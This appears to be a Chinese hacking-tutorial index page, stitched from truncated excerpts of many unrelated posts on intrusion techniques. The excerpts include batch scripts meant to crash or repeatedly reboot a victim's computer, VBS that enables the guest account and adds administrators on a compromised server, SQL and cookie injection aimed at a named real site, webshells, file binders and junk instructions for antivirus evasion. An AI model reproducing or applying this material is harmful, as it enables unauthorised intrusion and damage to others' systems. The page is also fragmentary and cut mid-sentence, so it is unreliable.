黑客教程

站内搜索地址为： httpwww.google.comcustomdomains=（这里写我们要搜索的站点，比如feelids.com） 进去可以选择www和feelids.com， 当然再选我们要的站内搜索哦！ 黑客专用信息和资料搜索地址为：

很多网上安全教程都介绍了如何通过百度和GOOGLE来搜索漏洞代码而发动攻击，这种文章在实际应用中没有什么价值，毕竟很多时候我们需要定点定位攻击目标服务器而不是这种广撒网覆盖形式的入侵。只有学会针对某定点服务器进行扫描和攻击才有利于我们增长企业安全防范与攻击技

定义： DNS欺骗就是攻击者冒充域名服务器的一种欺骗行为。 原理：如果可以冒充域名服务器，然后把查询的IP地址设为攻击者的IP地址，这样的话，用户上网就只能看到攻击者的主页，而不是用户想要取得的网站的主页了，这就是DNS欺骗的基本原理。DNS欺骗其实并不是真的“

现在很多网站都采用了通用防注入程序，那么对于这种网站，我门是否就束手无策了呢？答案是否定的，因为我们可以采用cookie 注入的方法，而很多通用防注入程序对这种注入方式都没有防备。 在讲之前,我们还是来回顾下ASP脚本中Request对象的知识吧,上面几讲中都提到Reques

DDOS网络攻击是我们最常见的问题了，要防止DDOS网络攻击，首先就要了解其攻击的方式。 　　1.Synflood:该攻击以多个随机的源主机地址向目的主机发送SYN包，而在收到目的主机的SYN ACK后并不回应，这样，目的主机就为这些源主机建立了大量的连接队列，而且由

最近遇到一个使用了Oracle数据库的服务器，在狂学Oracle 请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦，为了兄弟们以后少走些弯路，我把入侵当中必需的命令整理出来。 1、su – oracle 不是必需，适合于没有DB

如何能够快速检测定位出局域网中的ARP病毒电脑？ 面对着局域网中成百台电脑，一个一个地检测显然不是好办法。其实我们只要利用ARP病毒的基本原理：发送伪造的ARP欺骗广播，中毒电脑自身伪装成网关的特性，就可以快速锁定中毒电脑。可以设想用程序来实现以下功能：

第一个:让别人内存OVER(逼他重启) @echo off start cmd %0 就这3行了 第二个:让对方重启指定次数(害人专用) @echo off if not exist c:1.txt echo. >c:1.tx

具体的原理与分析过程我就不写了，写起来一大片，大家看的心烦我写的头痛，我就讲操作过程中的细节。隐私报告里设置处需要接受所有的cookie将安全降低。 具体的原理与分析过程我就不写了，写起来一大片，大家看的心烦我写的头痛，我就讲操作过程中的细节。隐私报告里

樱木花盗's BLOG 今天看到有个关于搜索型注入的文章，用到的是一种新技术，探测的是三星：http://notebook.samsung.com.cn/index.aspx 注入方式是： 一般网站的搜索都是部分匹配的 有漏洞的u

互联网的安全在今天越来越被更多的人重视。人们采用各种办法来保护网络安全。可总也避免不了这样那样的攻击、漏洞。下面例举了十种可瞬间毁掉整个互联网的袭击手段，让大家看看。也希望大家在日常上网或工作时能够注意到。 1. DNS （域名解析服务）被颠覆了。互联网

1、webshell 这是“黑客”在web网站留下的网页后门程序，一般由一些网页程序编写，来执行一些特殊的功能。如PHP、ASP等。如它可以执行某些命令，如果web网站管理员对服务器权限设置出现漏洞。“黑客”可以通过它，直接进行网站的文件管理，如果权限足够大，“黑客”

Windows XP的使用过程中如果你是一个很容易遗忘的人，那么一定不要忘记在第一次设置密码的同时创建一张可以恢复Windows XP中的账户密码的启动盘，它可以让你免去格式化硬盘的烦恼。 　　从“控制面板”中找到“用户账户”

dim wsh set wsh=createobject("wscript.shell") wsh.run "net user guest /active:yes",0 （激活guest账号） wsh.run "

在获得SA密码后，往往因为服务器管理者或”前人”将net.exe和net1.exe被限制使用，无法添加管理员账号。我们知道VBS在活动目录(ADSI)部分有一个winnt对象，用来管理本地资源，利用它可以不依靠CMD等命令就能添加一个管理员，具体代码如下：

有时候拿到一SHELL是SA权限。 但是内网。我们直接想到用LCX转发端口 那假如LCX被杀了之后你会怎么办呢 当然很多人就会想到用远控。。。 因为我没玩过远控和其他的病毒 所以就想到了以下的办法 第一导出注册表的启动项。修改里面杀毒的

一、传统的捆绑器 　　这种原理很简单，也是目前用的最多的一种。就是将B.exe附加到A.exe的末尾。这样当A.exe被执行的时候，B.exe也跟着执行了。这种捆绑器的代码是满网都是。我最早是从jingtao的一篇关于流的文章中得知的。就目前来说，已经没什么技术含量了。

大家在是否碰到过这样的站点： 全站文章系统采用FSO静态生成的HTML文件来显示。这样做的好处一来可以减轻服务器负担，提高访问速度。二来也阻止了SQL注入式的攻击。。 我来说说他们的文章系统原理：全部文章均在数据库存有一个副本。另处根据模板生成一个HTML页面

一、看见漏洞公告 　　最近想学习一下文件包含漏洞，在无意中看见了关于文件包含的漏洞公告。大致的意思是这样的，PhpwCMS 1.2.6系统的下列文件存在文件包含漏洞：include/inc_ext/spaw/dialogs/table.php 　　include/inc_

注:编写花指令,可参考以下成双指令,可任意自由组合.达到免杀效果. push ebp pop ebp push eax pop eax push esp pop esp push 0 push 0 push